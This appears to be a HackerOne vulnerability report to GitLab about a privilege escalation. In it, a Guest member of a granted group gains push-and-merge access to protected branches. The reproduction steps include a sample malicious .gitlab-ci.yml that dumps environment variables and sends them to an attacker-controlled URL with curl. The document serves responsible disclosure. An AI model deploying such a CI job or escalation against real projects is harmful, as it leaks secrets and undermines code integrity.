Unauthorized member can gain `Allowed to push and merge` access and affect integrity of protected branches
HackerOne report #2104540 by theluci
on 2023-08-09, assigned to GitLab Team
:
Report | Attachments | How To Reproduce
Report
Hello,
I found that when a group is granted Allowed to push and merge access to the protected branch of a project.
It is not checked whether the member gaining Allowed to push and merge access is atleast a Developer in the granted group. But only whether the member has a max role of Developer in the project or not.
Background
Gitlab provides a PREMIUM/ULTIMATE feature to grant specific groups or specific users Allowed to merge and Allowed to push and merge access on protected branches.
When a specific user is being granted Allowed to push and merge access.
Only users with atleast Developer role are shown and can be granted the above access.
Similarly, when a group is granted Allowed to push and merge access to the protected branch of a project.
Only the members of the group with atleast Developer role are granted the above access.
Vulnerability
When a group is granted Allowed to push and merge access to the protected branch of a project.
It is not checked whether the user gaining Allowed to push and merge access is atleast a Developer in the granted group.
It is only checked whether the user,
a) Is a member of the granted group
b) Has a maximum role of Developer in the project
Due to this the following Attack is possible,
-
victim
is the Owner ofvictim-project
. -
attacker
is a Developer ofvictim-project
. -
victim
goes tohttps://gitlab.com/<victim-group>/<victim-project>/-/project_members
and addsgranted-group
as Developer. -
victim
goes tohttps://gitlab.com/<victim-group>/<victim-project>/-/settings/repository
, Expand Protected branches and grants Allowed to push and merge access togranted-group
.
victim
expects that only the members of the granted-group
with atleast Developer role are granted the above access.
-
attacker
is successful in joining thegranted-group
as a Guest.
As attacker
and victim
are already working on victim-project
together, it will be quite easy and most possible for attacker
to join granted-group
as a Guest.
-
attacker
automatically gains Allowed to push and merge access on the protected branch.
victim
has no idea that attacker
has gained Allowed to push and merge access on the protected branch.
-
attacker
can use this access to,a) Affect the integrity of the protected branch
b) Upload a malicious .gitlab-ci.yml file to leak the project and parent group’s CI/CD variables
Steps to reproduce
-
victim
creates a groupvictim-group
and activates Ultimate trial. -
victim
creates a projectvictim-project
insidevictim-group
. -
victim
goes tohttps://gitlab.com/<victim-group>/<victim-project>/-/project_members
and addsattacker
as Developer. -
victim
creates a groupgranted-group
. -
victim
goes togranted-group
membership pagehttps://gitlab.com/groups/<granted-group>/-/group_members
and addsvictim-member
as Developer. -
victim
goes tovictim-project
membership pagehttps://gitlab.com/<victim-group>/<victim-project>/-/project_members
and invitesgranted-group
as Developer. -
victim
goes tohttps://gitlab.com/<victim-group>/<victim-project>/-/settings/repository
, Expand Protected branches and grants Allowed to push and merge access togranted-group
.
victim
expects that only the members of the granted-group
with atleast Developer role are granted the above access.
-
victim
goes togranted-group
membership pagehttps://gitlab.com/groups/<granted-group>/-/group_members
and addsattacker
as Guest.
As attacker
and victim
are already working on victim-project
together, it will be quite easy and most possible for attacker
to join granted-group
as a Guest.
-
attacker
automatically gains Allowed to push and merge access on the protected branch.
victim
has no idea that attacker
has gained Allowed to push and merge access on the protected branch.
-
attacker
can use this access to affect the Integrity of the protected branch,
-
attacker
can create a new file using the+
symbol. -
attacker
may choose to edit an existing file or delete an existing file.
-
attacker
can also use this access to Upload a malicious .gitlab-ci.yml file with the following content,
job_name:
script:
- export > test.txt
- curl -X POST --data "$(cat test.txt)" attacker-controlled-url
To leak the project and parent group’s CI/CD variables affecting Confidentiality.
(While testing this make sure victim
has added some CI/CD variables in victim-project
and victim-group
)
POC
Output of checks
This bug happens on GitLab.com (Probably on instance too).
Impact
Unauthorized member can gain Allowed to push and merge
access on protected branches and use this access to,
- Affect the Integrity of the protected branches.
- Upload a malicious .gitlab-ci.yml file to leak the project and parent group’s CI/CD variables affecting Confidentiality.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: